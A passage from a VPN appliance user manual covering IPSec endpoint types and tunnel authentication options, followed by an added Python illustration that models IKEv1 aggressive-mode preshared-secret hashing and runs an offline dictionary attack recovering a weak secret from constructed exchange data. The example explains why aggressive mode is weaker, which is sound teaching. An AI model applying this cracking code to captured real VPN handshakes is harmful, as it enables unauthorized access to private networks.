User manual
Virtual Private Networking
204
3. DNS hostname address to static IP address
4. DNS hostname address to DNS hostname address
5. DNS hostname address to dynamic IP address
Select the type of IPSec endpoint this SG unit has on the interface on which the tunnel is
going out. The SG unit can either have a static IP, dynamic IP or DNS hostname
address. If a dynamic DNS service is to be used or there is a DNS hostname that
resolves to the IP address of the port, then the DNS hostname address option should be
selected. In this example, select dynamic IP address.
Select the type of IPSec endpoint the remote party has. The remote endpoint can have a
static IP address, dynamic IP address or a DNS hostname address. In this example,
select the static IP address option.
Select the type of authentication for the tunnel to use. The SG unit supports the following
types of authentication:
• Preshared Secret is a common secret (passphrase) that is shared between the
SG unit and the remote party.
This authentication method is widely supported and relatively simple to configure. It is
reasonably secure with main mode keying, but less so with aggressive mode keying: in
aggressive mode the hash derived from the secret is sent unencrypted, so anyone who
captures the exchange can test candidate secrets against it offline. If aggressive mode
must be used, choose a long, random secret rather than a passphrase.
• RSA Digital Signatures uses a public/private RSA key pair for authentication.
The SG unit can generate these key pairs. The public keys need to be
exchanged between the SG unit and the remote party in order to configure the
tunnel.
This authentication method is not widely supported, but it is relatively secure and
allows dynamic endpoints to be used with main mode keying.
• X.509 Certificates are used to authenticate the remote party against a Certificate
Authority (CA) certificate. The CA certificate must have signed the local
certificates that are used for tunnel authentication; a certificate issued by a
different CA will fail authentication. Certificates need to be uploaded to the SG
unit before a tunnel can be configured to use them (see Certificate Management).
This authentication method is widely supported and very secure; however,
differing terminology between vendors can make it difficult to set up a tunnel
between an SG unit and an appliance from another vendor. This authentication
method allows dynamic endpoints to be used with main mode keying.
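The following added example is not code from the SG unit or this manual; it is a stripped-down model of the IKEv1 aggressive-mode preshared-secret authentication described in RFC 2409 (section 5.4), written to show why the Preshared Secret entry above calls aggressive mode keying less secure. The prf is fixed to HMAC-SHA1, and every nonce, cookie, Diffie-Hellman value and payload body is constructed test data, not captured traffic. It generalizes the point slightly by running the attack as an attacker would: every input to the responder's HASH_R except the secret itself travels in the clear, so a captured exchange can be checked against a wordlist without sending a single packet.

```python
import hashlib
import hmac

# Added illustration (not SG unit code). Models IKEv1 aggressive mode with
# pre-shared-key authentication per RFC 2409 sec. 5.4, prf = HMAC-SHA1.
# All values below are constructed for the example.


def skeyid_psk(psk: bytes, ni_b: bytes, nr_b: bytes) -> bytes:
    """SKEYID = prf(pre-shared-key, Ni_b | Nr_b)."""
    return hmac.new(psk, ni_b + nr_b, hashlib.sha1).digest()


def hash_r(psk: bytes, x: dict) -> bytes:
    """HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b).

    In aggressive mode every field of x is sent unencrypted, so a passive
    observer holds everything needed to recompute HASH_R for a guessed PSK.
    In main mode HASH_R is carried in an encrypted message, which is why the
    same secret is safer there."""
    skeyid = skeyid_psk(psk, x["ni_b"], x["nr_b"])
    msg = x["gxr"] + x["gxi"] + x["cky_r"] + x["cky_i"] + x["sai_b"] + x["idir_b"]
    return hmac.new(skeyid, msg, hashlib.sha1).digest()


def constructed_exchange(psk: bytes) -> dict:
    """Build a fake aggressive-mode exchange as seen on the wire.

    Fixed, constructed values; real DH values and nonces are random and
    much larger, but that does not change the attack."""
    x = {
        "gxi": bytes.fromhex("aa" * 32),                # initiator DH public value
        "gxr": bytes.fromhex("bb" * 32),                # responder DH public value
        "cky_i": bytes.fromhex("0102030405060708"),     # initiator cookie
        "cky_r": bytes.fromhex("1112131415161718"),     # responder cookie
        "sai_b": b"\x00\x01\x00\x00\x80\x01\x00\x05",   # SA payload body (constructed)
        "idir_b": b"\x02\x00\x00\x00" + b"vpn.example.net",  # responder ID_FQDN
        "ni_b": bytes.fromhex("c1" * 16),               # initiator nonce
        "nr_b": bytes.fromhex("d2" * 16),               # responder nonce
    }
    # The responder sends HASH_R in message 2, in the clear.
    x["hash_r"] = hash_r(psk, x)
    return x


def offline_dictionary_attack(x: dict, wordlist):
    """Try each candidate secret against the captured HASH_R; returns the
    matching secret or None. No packets are sent, so the VPN gateway never
    sees the guesses and cannot rate-limit or log them."""
    for cand in wordlist:
        if hmac.compare_digest(hash_r(cand, x), x["hash_r"]):
            return cand
    return None


# Constructed wordlist standing in for a real password dictionary.
WORDLIST = [b"password", b"123456", b"vpnvpn", b"letmein", b"s3cret"]


def demo() -> bytes:
    """Capture an exchange protected by a weak passphrase and recover it."""
    captured = constructed_exchange(b"letmein")
    return offline_dictionary_attack(captured, WORDLIST)


if __name__ == "__main__":
    print(demo())
```

A secret that is long and random is not in any wordlist, which is why the manual's advice to prefer main mode (or at least a strong secret) with Preshared Secret authentication matters; RSA signatures and X.509 certificates avoid this class of attack entirely because no password-derived value is exposed.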